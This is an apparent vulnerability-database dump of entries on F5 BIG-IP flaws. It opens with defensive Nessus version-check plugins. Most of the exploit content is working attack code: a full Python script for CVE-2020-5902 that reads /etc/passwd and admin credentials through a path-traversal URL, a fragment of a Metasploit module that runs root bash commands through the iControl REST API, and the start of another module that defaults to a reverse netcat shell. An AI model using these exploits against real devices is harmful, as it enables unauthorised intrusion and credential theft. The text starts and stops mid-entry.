exit(0);\n}\n\n\ninclude('f5_func.inc');\n\nif ( ! get_kb_item('Host/local_checks_enabled') ) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nvar version = get_kb_item('Host/BIG-IP/version');\nif ( ! version ) audit(AUDIT_OS_NOT, 'F5 Networks BIG-IP');\nif ( isnull(get_kb_item('Host/BIG-IP/hotfix')) ) audit(AUDIT_KB_MISSING, 'Host/BIG-IP/hotfix');\nif ( ! 
get_kb_item('Host/BIG-IP/modules') ) audit(AUDIT_KB_MISSING, 'Host/BIG-IP/modules');\n\nif (report_paranoia < 2) audit(AUDIT_PARANOID);\n\nvar sol = 'K03009991';\nvar vmatrix = {\n 'AFM': {\n 'affected': [\n '16.0.0-16.0.1','15.1.0-15.1.2','14.1.0-14.1.3','13.1.0-13.1.3','12.1.0-12.1.5'\n ],\n 'unaffected': [\n '16.1.0','16.0.1.1','15.1.2.1','14.1.4','13.1.3.6','12.1.5.3'\n ],\n },\n 'AM': {\n 'affected': [\n '16.0.0-16.0.1','15.1.0-15.1.2','14.1.0-14.1.3','13.1.0-13.1.3','12.1.0-12.1.5'\n ],\n 'unaffected': [\n '16.1.0','16.0.1.1','15.1.2.1','14.1.4','13.1.3.6','12.1.5.3'\n ],\n },\n 'APM': {\n 'affected': [\n '16.0.0-16.0.1','15.1.0-15.1.2','14.1.0-14.1.3','13.1.0-13.1.3','12.1.0-12.1.5'\n ],\n 'unaffected': [\n '16.1.0','16.0.1.1','15.1.2.1','14.1.4','13.1.3.6','12.1.5.3'\n ],\n },\n 'ASM': {\n 'affected': [\n '16.0.0-16.0.1','15.1.0-15.1.2','14.1.0-14.1.3','13.1.0-13.1.3','12.1.0-12.1.5'\n ],\n 'unaffected': [\n '16.1.0','16.0.1.1','15.1.2.1','14.1.4','13.1.3.6','12.1.5.3'\n ],\n },\n 'AVR': {\n 'affected': [\n '16.0.0-16.0.1','15.1.0-15.1.2','14.1.0-14.1.3','13.1.0-13.1.3','12.1.0-12.1.5'\n ],\n 'unaffected': [\n '16.1.0','16.0.1.1','15.1.2.1','14.1.4','13.1.3.6','12.1.5.3'\n ],\n },\n 'GTM': {\n 'affected': [\n '16.0.0-16.0.1','15.1.0-15.1.2','14.1.0-14.1.3','13.1.0-13.1.3','12.1.0-12.1.5'\n ],\n 'unaffected': [\n '16.1.0','16.0.1.1','15.1.2.1','14.1.4','13.1.3.6','12.1.5.3'\n ],\n },\n 'LC': {\n 'affected': [\n '16.0.0-16.0.1','15.1.0-15.1.2','14.1.0-14.1.3','13.1.0-13.1.3','12.1.0-12.1.5'\n ],\n 'unaffected': [\n '16.1.0','16.0.1.1','15.1.2.1','14.1.4','13.1.3.6','12.1.5.3'\n ],\n },\n 'LTM': {\n 'affected': [\n '16.0.0-16.0.1','15.1.0-15.1.2','14.1.0-14.1.3','13.1.0-13.1.3','12.1.0-12.1.5'\n ],\n 'unaffected': [\n '16.1.0','16.0.1.1','15.1.2.1','14.1.4','13.1.3.6','12.1.5.3'\n ],\n },\n 'PEM': {\n 'affected': [\n '16.0.0-16.0.1','15.1.0-15.1.2','14.1.0-14.1.3','13.1.0-13.1.3','12.1.0-12.1.5'\n ],\n 'unaffected': [\n 
'16.1.0','16.0.1.1','15.1.2.1','14.1.4','13.1.3.6','12.1.5.3'\n ],\n }\n};\n\nif (bigip_is_affected(vmatrix:vmatrix, sol:sol))\n{\n var extra = NULL;\n if (report_verbosity > 0) extra = bigip_report_get();\n security_report_v4(\n port : 0,\n severity : SECURITY_HOLE,\n extra : extra\n );\n}\nelse\n{\n var tested = bigip_get_tested_modules();\n var audit_extra = 'For BIG-IP module(s) ' + tested + ',';\n if (tested) audit(AUDIT_INST_VER_NOT_VULN, audit_extra, version);\n else audit(AUDIT_HOST_NOT, 'running any of the affected modules');\n}\n", "cvss": {"score": 10, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-08-16T17:16:54", "description": "A remote code execution vulnerability exists in the iControl REST API feature of F5's BIG-IP product. An unauthenticated, remote attacker can exploit this to bypass authentication and execute arbitrary commands with root privileges.", "cvss3": {"score": 9.8, "vector": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H"}, "published": "2021-03-24T00:00:00", "type": "nessus", "title": "F5 BIG-IP RCE (CVE-2021-22986)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2021-22986"], "modified": "2022-08-15T00:00:00", "cpe": ["cpe:/h:f5:big-ip"], "id": "F5_CVE-2021-22986.NBIN", "href": "https://www.tenable.com/plugins/nessus/148022", "sourceData": "Binary data f5_cve-2021-22986.nbin", "cvss": {"score": 10, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-06-16T14:55:22", "description": "The version of F5 Networks BIG-IP installed on the remote host is prior to 11.6.5.3 / 12.1.5.3 / 13.1.3.6 / 14.1.4 / 15.1.2.1 / 16.0.1.1 / 16.1.0. 
It is, therefore, affected by a vulnerability as referenced in the K18132488 advisory.\n\n - On BIG-IP versions 16.0.x before 16.0.1.1, 15.1.x before 15.1.2.1, 14.1.x before 14.1.4, 13.1.x before 13.1.3.6, 12.1.x before 12.1.5.3, and 11.6.x before 11.6.5.3 when running in Appliance mode, the Traffic Management User Interface (TMUI), also referred to as the Configuration utility, has an authenticated remote command execution vulnerability in undisclosed pages. Note: Software versions which have reached End of Software Development (EoSD) are not evaluated. (CVE-2021-22987)\n\nNote that Nessus has not tested for this issue but has instead relied only on the application's self-reported version number.", "cvss3": {"score": 9.9, "vector": "CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:C/C:H/I:H/A:H"}, "published": "2021-03-10T00:00:00", "type": "nessus", "title": "F5 Networks BIG-IP : Appliance mode TMUI authenticated remote command execution vulnerability (K18132488)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2021-22987", "CVE-2021-22988"], "modified": "2022-05-10T00:00:00", "cpe": ["cpe:/a:f5:big-ip_access_policy_manager", "cpe:/a:f5:big-ip_advanced_firewall_manager", "cpe:/a:f5:big-ip_application_acceleration_manager", "cpe:/a:f5:big-ip_application_security_manager", "cpe:/a:f5:big-ip_application_visibility_and_reporting", "cpe:/a:f5:big-ip_global_traffic_manager", "cpe:/a:f5:big-ip_link_controller", "cpe:/a:f5:big-ip_local_traffic_manager", "cpe:/a:f5:big-ip_policy_enforcement_manager", "cpe:/h:f5:big-ip"], "id": "F5_BIGIP_SOL18132488.NASL", "href": "https://www.tenable.com/plugins/nessus/147636", "sourceData": "##\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from F5 Networks BIG-IP Solution K18132488.\n#\n# @NOAGENT@\n##\n\ninclude('compat.inc');\n\nif (description)\n{\n script_id(147636);\n script_version(\"1.7\");\n script_set_attribute(attribute:\"plugin_modification_date\", 
value:\"2022/05/10\");\n\n script_cve_id(\"CVE-2021-22987\", \"CVE-2021-22988\");\n script_xref(name:\"IAVA\", value:\"2021-A-0127\");\n\n script_name(english:\"F5 Networks BIG-IP : Appliance mode TMUI authenticated remote command execution vulnerability (K18132488)\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote device is missing a vendor-supplied security patch.\");\n script_set_attribute(attribute:\"description\", value:\n\"The version of F5 Networks BIG-IP installed on the remote host is prior to 11.6.5.3 / 12.1.5.3 / 13.1.3.6 / 14.1.4 /\n15.1.2.1 / 16.0.1.1 / 16.1.0. It is, therefore, affected by a vulnerability as referenced in the K18132488 advisory.\n\n - On BIG-IP versions 16.0.x before 16.0.1.1, 15.1.x before 15.1.2.1, 14.1.x before 14.1.4, 13.1.x before\n 13.1.3.6, 12.1.x before 12.1.5.3, and 11.6.x before 11.6.5.3 when running in Appliance mode, the Traffic\n Management User Interface (TMUI), also referred to as the Configuration utility, has an authenticated\n remote command execution vulnerability in undisclosed pages. Note: Software versions which have reached\n End of Software Development (EoSD) are not evaluated. 
(CVE-2021-22987)\n\nNote that Nessus has not tested for this issue but has instead relied only on the application's self-reported version\nnumber.\");\n script_set_attribute(attribute:\"see_also\", value:\"https://support.f5.com/csp/article/K18132488\");\n script_set_attribute(attribute:\"solution\", value:\n\"Upgrade to one of the non-vulnerable versions listed in the F5 Solution K18132488.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:S/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:U/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:C/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:U/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2021-22988\");\n script_set_attribute(attribute:\"cvss3_score_source\", value:\"CVE-2021-22987\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"No known exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"false\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2021/03/11\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2021/03/10\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2021/03/10\");\n\n script_set_attribute(attribute:\"potential_vulnerability\", value:\"true\");\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:f5:big-ip_access_policy_manager\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:f5:big-ip_advanced_firewall_manager\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:f5:big-ip_application_acceleration_manager\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:f5:big-ip_application_security_manager\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:f5:big-ip_application_visibility_and_reporting\");\n script_set_attribute(attribute:\"cpe\", 
value:\"cpe:/a:f5:big-ip_global_traffic_manager\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:f5:big-ip_link_controller\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:f5:big-ip_local_traffic_manager\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:f5:big-ip_policy_enforcement_manager\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/h:f5:big-ip\");\n script_set_attribute(attribute:\"stig_severity\", value:\"I\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"F5 Networks Local Security Checks\");\n\n script_copyright(english:\"This script is Copyright (C) 2021-2022 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"f5_bigip_detect.nbin\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/BIG-IP/hotfix\", \"Host/BIG-IP/modules\", \"Host/BIG-IP/version\", \"Settings/ParanoidReport\");\n\n exit(0);\n}\n\n\ninclude('f5_func.inc');\n\nif ( ! get_kb_item('Host/local_checks_enabled') ) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nvar version = get_kb_item('Host/BIG-IP/version');\nif ( ! version ) audit(AUDIT_OS_NOT, 'F5 Networks BIG-IP');\nif ( isnull(get_kb_item('Host/BIG-IP/hotfix')) ) audit(AUDIT_KB_MISSING, 'Host/BIG-IP/hotfix');\nif ( ! 
get_kb_item('Host/BIG-IP/modules') ) audit(AUDIT_KB_MISSING, 'Host/BIG-IP/modules');\n\nif (report_paranoia < 2) audit(AUDIT_PARANOID);\n\nvar sol = 'K18132488';\nvar vmatrix = {\n 'AFM': {\n 'affected': [\n '16.0.0-16.0.1','15.1.0-15.1.2','14.1.0-14.1.3','13.1.0-13.1.3','12.1.0-12.1.5','11.6.1-11.6.5'\n ],\n 'unaffected': [\n '16.1.0','16.0.1.1','15.1.2.1','14.1.4','13.1.3.6','12.1.5.3','11.6.5.3'\n ],\n },\n 'AM': {\n 'affected': [\n '16.0.0-16.0.1','15.1.0-15.1.2','14.1.0-14.1.3','13.1.0-13.1.3','12.1.0-12.1.5','11.6.1-11.6.5'\n ],\n 'unaffected': [\n '16.1.0','16.0.1.1','15.1.2.1','14.1.4','13.1.3.6','12.1.5.3','11.6.5.3'\n ],\n },\n 'APM': {\n 'affected': [\n '16.0.0-16.0.1','15.1.0-15.1.2','14.1.0-14.1.3','13.1.0-13.1.3','12.1.0-12.1.5','11.6.1-11.6.5'\n ],\n 'unaffected': [\n '16.1.0','16.0.1.1','15.1.2.1','14.1.4','13.1.3.6','12.1.5.3','11.6.5.3'\n ],\n },\n 'ASM': {\n 'affected': [\n '16.0.0-16.0.1','15.1.0-15.1.2','14.1.0-14.1.3','13.1.0-13.1.3','12.1.0-12.1.5','11.6.1-11.6.5'\n ],\n 'unaffected': [\n '16.1.0','16.0.1.1','15.1.2.1','14.1.4','13.1.3.6','12.1.5.3','11.6.5.3'\n ],\n },\n 'AVR': {\n 'affected': [\n '16.0.0-16.0.1','15.1.0-15.1.2','14.1.0-14.1.3','13.1.0-13.1.3','12.1.0-12.1.5','11.6.1-11.6.5'\n ],\n 'unaffected': [\n '16.1.0','16.0.1.1','15.1.2.1','14.1.4','13.1.3.6','12.1.5.3','11.6.5.3'\n ],\n },\n 'GTM': {\n 'affected': [\n '16.0.0-16.0.1','15.1.0-15.1.2','14.1.0-14.1.3','13.1.0-13.1.3','12.1.0-12.1.5','11.6.1-11.6.5'\n ],\n 'unaffected': [\n '16.1.0','16.0.1.1','15.1.2.1','14.1.4','13.1.3.6','12.1.5.3','11.6.5.3'\n ],\n },\n 'LC': {\n 'affected': [\n '16.0.0-16.0.1','15.1.0-15.1.2','14.1.0-14.1.3','13.1.0-13.1.3','12.1.0-12.1.5','11.6.1-11.6.5'\n ],\n 'unaffected': [\n '16.1.0','16.0.1.1','15.1.2.1','14.1.4','13.1.3.6','12.1.5.3','11.6.5.3'\n ],\n },\n 'LTM': {\n 'affected': [\n '16.0.0-16.0.1','15.1.0-15.1.2','14.1.0-14.1.3','13.1.0-13.1.3','12.1.0-12.1.5','11.6.1-11.6.5'\n ],\n 'unaffected': [\n 
'16.1.0','16.0.1.1','15.1.2.1','14.1.4','13.1.3.6','12.1.5.3','11.6.5.3'\n ],\n },\n 'PEM': {\n 'affected': [\n '16.0.0-16.0.1','15.1.0-15.1.2','14.1.0-14.1.3','13.1.0-13.1.3','12.1.0-12.1.5','11.6.1-11.6.5'\n ],\n 'unaffected': [\n '16.1.0','16.0.1.1','15.1.2.1','14.1.4','13.1.3.6','12.1.5.3','11.6.5.3'\n ],\n }\n};\n\nif (bigip_is_affected(vmatrix:vmatrix, sol:sol))\n{\n var extra = NULL;\n if (report_verbosity > 0) extra = bigip_report_get();\n security_report_v4(\n port : 0,\n severity : SECURITY_HOLE,\n extra : extra\n );\n}\nelse\n{\n var tested = bigip_get_tested_modules();\n var audit_extra = 'For BIG-IP module(s) ' + tested + ',';\n if (tested) audit(AUDIT_INST_VER_NOT_VULN, audit_extra, version);\n else audit(AUDIT_HOST_NOT, 'running any of the affected modules');\n}\n", "cvss": {"score": 9, "vector": "AV:N/AC:L/Au:S/C:C/I:C/A:C"}}, {"lastseen": "2022-06-16T14:55:20", "description": "The version of F5 Networks BIG-IP installed on the remote host is prior to 11.6.5.3 / 12.1.5.3 / 13.1.3.6 / 14.1.4 / 15.1.2.1 / 16.0.1.1 / 16.1.0. It is, therefore, affected by a vulnerability as referenced in the K70031188 advisory.\n\n - On BIG-IP versions 16.0.x before 16.0.1.1, 15.1.x before 15.1.2.1, 14.1.x before 14.1.4, 13.1.x before 13.1.3.6, 12.1.x before 12.1.5.3, and 11.6.x before 11.6.5.3, TMUI, also referred to as the Configuration utility, has an authenticated remote command execution vulnerability in undisclosed pages. Note: Software versions which have reached End of Software Development (EoSD) are not evaluated. 
#{Rex::Text.encode_base64(cmd)} | base64 -d)\"\r\n\r\n print_status(\"Executing command: #{bash_cmd}\")\r\n\r\n res = send_request_cgi({\r\n 'method' => 'POST',\r\n 'uri' => normalize_uri(target_uri.path, '/mgmt/tm/util/bash'),\r\n 'ctype' => 'application/json',\r\n 'headers' => {\r\n 'X-F5-Auth-Token' => @token\r\n },\r\n 'data' => {\r\n 'command' => 'run',\r\n 'utilCmdArgs' => \"-c '#{bash_cmd}'\"\r\n }.to_json\r\n }, datastore['CmdExecTimeout'])\r\n\r\n unless res\r\n vprint_warning('Command execution timed out')\r\n return\r\n end\r\n\r\n unless res.code == 200 && res.get_json_document['kind'] == 'tm:util:bash:runstate'\r\n fail_with(Failure::PayloadFailed, 'Failed to execute command')\r\n end\r\n\r\n print_good('Successfully executed command')\r\n\r\n return unless (cmd_result = res.get_json_document['commandResult'])\r\n\r\n vprint_line(cmd_result)\r\n end\r\n\r\n def login_reference_endpoint\r\n if datastore['ENDPOINT']\r\n return normalize_uri(target_uri.path, datastore['ENDPOINT'])\r\n end\r\n\r\n @token_generation_endpoint ||= token_generation_endpoints.sample\r\n\r\n normalize_uri(target_uri.path, @token_generation_endpoint)\r\n end\r\n\r\n # Usable token generation endpoints between versions 12.1.4 and 16.0.1\r\n def token_generation_endpoints\r\n %w[\r\n /access/file-path-manager/indexing\r\n /cm/autodeploy/cluster-software-images/indexing\r\n /cm/autodeploy/qkview/indexing\r\n /cm/autodeploy/software-images/indexing\r\n /cm/autodeploy/software-volume-install/indexing\r\n /cm/system/authn/providers/tmos/1f44a60e-11a7-3c51-a49f-82983026b41b/users/indexing\r\n /cm/system/authn/providers/tmos/indexing\r\n /mgmt/shared/analytics/avr-proxy-tasks\r\n /mgmt/shared/gossip\r\n /mgmt/shared/gossip-peer-refresher\r\n /mgmt/shared/identified-devices/config/device-refresh\r\n /mgmt/shared/save-config\r\n /mgmt/tm/shared/bigip-failover-state\r\n /shared/analytics/avr-proxy-tasks\r\n /shared/analytics/avr-proxy-tasks/indexing\r\n 
/shared/analytics/event-aggregation-tasks/indexing\r\n /shared/analytics/event-analysis-tasks/indexing\r\n /shared/authn/providers/local/groups/indexing\r\n /shared/authz/remote-resources/indexing\r\n /shared/authz/resource-groups/indexing\r\n /shared/authz/roles/indexing\r\n /shared/authz/tokens/indexing\r\n /shared/chassis-framework-upgrades/indexing\r\n /shared/device-discovery-tasks/indexing\r\n /shared/device-group-key-pairs/indexing\r\n /shared/echo/indexing\r\n /shared/framework-info-tasks/indexing\r\n /shared/framework-upgrades/indexing\r\n /shared/gossip\r\n /shared/gossip-peer-refresher\r\n /shared/group-task/indexing\r\n /shared/iapp/blocks/indexing\r\n /shared/iapp/build-package/indexing\r\n /shared/iapp/health-prefix-map/indexing\r\n /shared/iapp/package-management-tasks/indexing\r\n /shared/iapp/template-loader/indexing\r\n /shared/identified-devices/config/device-refresh\r\n /shared/nodejs/loader-path-config/indexing\r\n /shared/package-deployments/indexing\r\n /shared/resolver/device-groups/indexing\r\n /shared/resolver/device-groups/tm-shared-all-big-ips/devices/indexing\r\n /shared/root-framework-upgrades/indexing\r\n /shared/rpm-tasks/indexing\r\n /shared/save-config\r\n /shared/snapshot-task/indexing\r\n /shared/snapshot/indexing\r\n /shared/stats-information/indexing\r\n /shared/storage/tasks/indexing\r\n /shared/task-scheduler/scheduler/indexing\r\n /shared/tmsh-shell/indexing\r\n /tm/analytics/afm-sweeper/generate-report/indexing\r\n /tm/analytics/afm-sweeper/report-results/indexing\r\n /tm/analytics/application-security-anomalies/generate-report/indexing\r\n /tm/analytics/application-security-anomalies/report-results/indexing\r\n /tm/analytics/application-security-network/generate-report/indexing\r\n /tm/analytics/application-security-network/report-results/indexing\r\n /tm/analytics/application-security/generate-report/indexing\r\n /tm/analytics/application-security/report-results/indexing\r\n 
/tm/analytics/asm-bypass/generate-report/indexing\r\n /tm/analytics/asm-bypass/report-results/indexing\r\n /tm/analytics/asm-cpu/generate-report/indexing\r\n /tm/analytics/asm-cpu/report-results/indexing\r\n /tm/analytics/asm-memory/generate-report/indexing\r\n /tm/analytics/asm-memory/report-results/indexing\r\n /tm/analytics/cpu/generate-report/indexing\r\n /tm/analytics/cpu/report-results/indexing\r\n /tm/analytics/disk-info/generate-report/indexing\r\n /tm/analytics/disk-info/report-results/indexing\r\n /tm/analytics/dns/generate-report/indexing\r\n /tm/analytics/dns/report-results/indexing\r\n /tm/analytics/dos-l3/generate-report/indexing\r\n /tm/analytics/dos-l3/report-results/indexing\r\n /tm/analytics/http/generate-report/indexing\r\n /tm/analytics/http/report-results/indexing\r\n /tm/analytics/ip-intelligence/generate-report/indexing\r\n /tm/analytics/ip-intelligence/report-results/indexing\r\n /tm/analytics/ip-layer/generate-report/indexing\r\n /tm/analytics/ip-layer/report-results/indexing\r\n /tm/analytics/lsn-pool/generate-report/indexing\r\n /tm/analytics/lsn-pool/report-results/indexing\r\n /tm/analytics/memory/generate-report/indexing\r\n /tm/analytics/memory/report-results/indexing\r\n /tm/analytics/network/generate-report/indexing\r\n /tm/analytics/network/report-results/indexing\r\n /tm/analytics/pem/generate-report/indexing\r\n /tm/analytics/pem/report-results/indexing\r\n /tm/analytics/proc-cpu/generate-report/indexing\r\n /tm/analytics/proc-cpu/report-results/indexing\r\n /tm/analytics/protocol-security-http/generate-report/indexing\r\n /tm/analytics/protocol-security-http/report-results/indexing\r\n /tm/analytics/protocol-security/generate-report/indexing\r\n /tm/analytics/protocol-security/report-results/indexing\r\n /tm/analytics/sip/generate-report/indexing\r\n /tm/analytics/sip/report-results/indexing\r\n /tm/analytics/swg-blocked/generate-report/indexing\r\n /tm/analytics/swg-blocked/report-results/indexing\r\n 
/tm/analytics/swg/generate-report/indexing\r\n /tm/analytics/swg/report-results/indexing\r\n /tm/analytics/tcp-analytics/generate-report/indexing\r\n /tm/analytics/tcp-analytics/report-results/indexing\r\n /tm/analytics/tcp/generate-report/indexing\r\n /tm/analytics/tcp/report-results/indexing\r\n /tm/analytics/udp/generate-report/indexing\r\n /tm/analytics/udp/report-results/indexing\r\n /tm/analytics/vcmp/generate-report/indexing\r\n /tm/analytics/vcmp/report-results/indexing\r\n /tm/analytics/virtual/generate-report/indexing\r\n /tm/analytics/virtual/report-results/indexing\r\n /tm/shared/bigip-failover-state\r\n /tm/shared/sys/backup/indexing\r\n ]\r\n end\r\n\r\nend\n\n# 0day.today [2021-10-12] #", "sourceHref": "https://0day.today/exploit/36066", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2020-07-27T13:59:31", "description": "Exploit for hardware platform in category web applications", "cvss3": {}, "published": "2020-07-27T00:00:00", "type": "zdt", "title": "F5 Big-IP 13.1.3 Build 0.0.6 - Local File Inclusion Vulnerability", "bulletinFamily": "exploit", "cvss2": {}, "cvelist": ["CVE-2020-5902"], "modified": "2020-07-27T00:00:00", "id": "1337DAY-ID-34748", "href": "https://0day.today/exploit/description/34748", "sourceData": "# Exploit Title: F5 Big-IP 13.1.3 Build 0.0.6 - Local File Inclusion\r\n# Exploit Author: Carlos E. 
Vieira\r\n# Vendor Homepage: https://www.f5.com/products/big-ip-services\r\n# Version: <= 13.1.3\r\n# Tested on: BIG-IP 13.1.3 Build 0.0.6\r\n# CVE : CVE-2020-5902\r\n\r\n#!/usr/bin/env python\r\n\r\nimport requests\r\nimport sys\r\nimport time\r\nimport urllib3\r\nimport json \r\nurllib3.disable_warnings()\r\n\r\nglobal target\r\n\r\ndef checkTarget():\r\n\r\n r = requests.head(target + \"/tmui/login.jsp\", verify=False)\r\n if(r.status_code == 200):\r\n return True\r\n else:\r\n return False\r\n\r\ndef checkVuln():\r\n\r\n r = requests.get(target + \"/tmui/login.jsp/..;/tmui/locallb/workspace/fileRead.jsp?fileName=/etc/passwd\", verify=False)\r\n if(r.status_code == 200):\r\n \r\n data = json.loads(r.text)\r\n if(len(data['output']) > 0):\r\n return True \r\n else:\r\n return False\r\n\r\n else:\r\n return False\r\n\r\ndef leakPasswd():\r\n print(\"[+] Leaking /etc/passwd from server\")\r\n time.sleep(2)\r\n exploit('/etc/passwd')\r\n\r\n\r\ndef leakHosts():\r\n print(\"[+] Leaking /etc/hosts from server\")\r\n time.sleep(2)\r\n exploit('/etc/hosts')\r\n\r\ndef leakLicence():\r\n\r\n print(\"[+] Leaking /config/bigip.license from server\")\r\n time.sleep(2)\r\n exploit('/config/bigip.license')\r\n\r\ndef leakAdmin():\r\n\r\n print(\"[+] Leaking admin credentials from server\")\r\n time.sleep(2)\r\n r = requests.get(target + \"/tmui/login.jsp/..;/tmui/locallb/workspace/tmshCmd.jsp?command=list+auth+user+admin\", verify=False)\r\n if(r.status_code == 200):\r\n \r\n data = json.loads(r.text)\r\n if(len(data['output']) > 0 ):\r\n print(data['output'])\r\n else:\r\n print(\"[X] Admin credentials not found\")\r\n else:\r\n print(\"[X] Fail to read file\")\r\n\r\n\r\ndef exploit(file):\r\n \r\n r = requests.get(target + \"/tmui/login.jsp/..;/tmui/locallb/workspace/fileRead.jsp?fileName=\" + file, verify=False)\r\n if(r.status_code == 200):\r\n data = json.loads(r.text)\r\n print(data['output'])\r\n else:\r\n print(\"[X] Fail to read file\")\r\n\r\ndef memoryLeak():\r\n 
print(\"[!] Leaking tomcat process from server\")\r\n time.sleep(2) \r\n r = requests.get(target + \"/tmui/login.jsp/..;/tmui/locallb/workspace/fileRead.jsp?fileName=/proc/self/cmdline\", verify=False)\r\n if(r.status_code == 200):\r\n data = json.loads(r.text)\r\n if(len(data['output'])>0):\r\n print(\"Command: \" + data['output'])\r\n\r\ndef main(host):\r\n\r\n print(\"[+] Check target...\")\r\n global target\r\n target = \"https://\" + host\r\n\r\n check = checkTarget()\r\n if(check):\r\n print(\"[~] Target is available\")\r\n\r\n vuln = checkVuln()\r\n if(vuln):\r\n print(\"[+] Target is vulnerable!\")\r\n\r\n time.sleep(1)\r\n print(\"[~] Leak information from target!\")\r\n time.sleep(1)\r\n leakPasswd()\r\n leakHosts()\r\n leakLicence()\r\n leakAdmin()\r\n memoryLeak()\r\n else:\r\n print(\"[X] Target is't vulnerable\")\r\n\r\n else:\r\n print(\"[x] Target is unavailable\")\r\n\r\n\r\nif __name__ == \"__main__\":\r\n\r\n if(len(sys.argv) < 2):\r\n print(\"Use: python {} ip/dns\".format(sys.argv[0]))\r\n else:\r\n host = sys.argv[1]\r\n main(host)\n\n# 0day.today [2020-07-27] #", "sourceHref": "https://0day.today/exploit/34748", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2021-12-02T09:27:35", "description": "", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 9.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 5.9}, "published": "2020-07-07T00:00:00", "type": "zdt", "title": "F5 BIG-IP TMUI Directory Traversal / File Upload / Code Execution Exploit", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, 
"obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2020-5902"], "modified": "2020-07-07T00:00:00", "id": "1337DAY-ID-34652", "href": "https://0day.today/exploit/description/34652", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nclass MetasploitModule < Msf::Exploit::Remote\n\n Rank = ExcellentRanking\n\n prepend Msf::Exploit::Remote::AutoCheck\n include Msf::Exploit::Remote::HttpClient\n include Msf::Exploit::CmdStager\n include Msf::Exploit::FileDropper\n\n def initialize(info = {})\n super(\n update_info(\n info,\n 'Name' => 'F5 BIG-IP TMUI Directory Traversal and File Upload RCE',\n 'Description' => %q{\n This module exploits a directory traversal in F5's BIG-IP Traffic\n Management User Interface (TMUI) to upload a shell script and execute\n it as the root user.\n\n Versions 11.6.1-11.6.5, 12.1.0-12.1.5, 13.1.0-13.1.3, 14.1.0-14.1.2,\n 15.0.0, and 15.1.0 are known to be vulnerable. 
Fixes were introduced\n in 11.6.5.2, 12.1.5.2, 13.1.3.4, 14.1.2.6, and 15.1.0.4.\n\n Tested on the VMware OVA release of 14.1.2.\n },\n 'Author' => [\n 'Mikhail Klyuchnikov', # Discovery\n 'wvu' # Analysis and exploit\n ],\n 'References' => [\n ['CVE', '2020-5902'],\n ['URL', 'https://support.f5.com/csp/article/K52145254'],\n ['URL', 'https://www.ptsecurity.com/ww-en/about/news/f5-fixes-critical-vulnerability-discovered-by-positive-technologies-in-big-ip-application-delivery-controller/']\n ],\n 'DisclosureDate' => '2020-06-30', # Vendor advisory\n 'License' => MSF_LICENSE,\n 'Platform' => ['unix', 'linux'],\n 'Arch' => [ARCH_CMD, ARCH_X86, ARCH_X64],\n 'Privileged' => true,\n 'Targets' => [\n [\n 'Unix Command',\n 'Platform' => 'unix',\n 'Arch' => ARCH_CMD,\n 'Type' => :unix_cmd,\n 'DefaultOptions' => {\n 'PAYLOAD' => 'cmd/unix/reverse_netcat_gaping'\n }\n ],\n [\n 'Linux Dropper',\n 'Platform' => 'linux',\n 'Arch' => [ARCH_X86, ARCH_X64],\n 'Type' => :linux_dropper,\n 'DefaultOptions' => 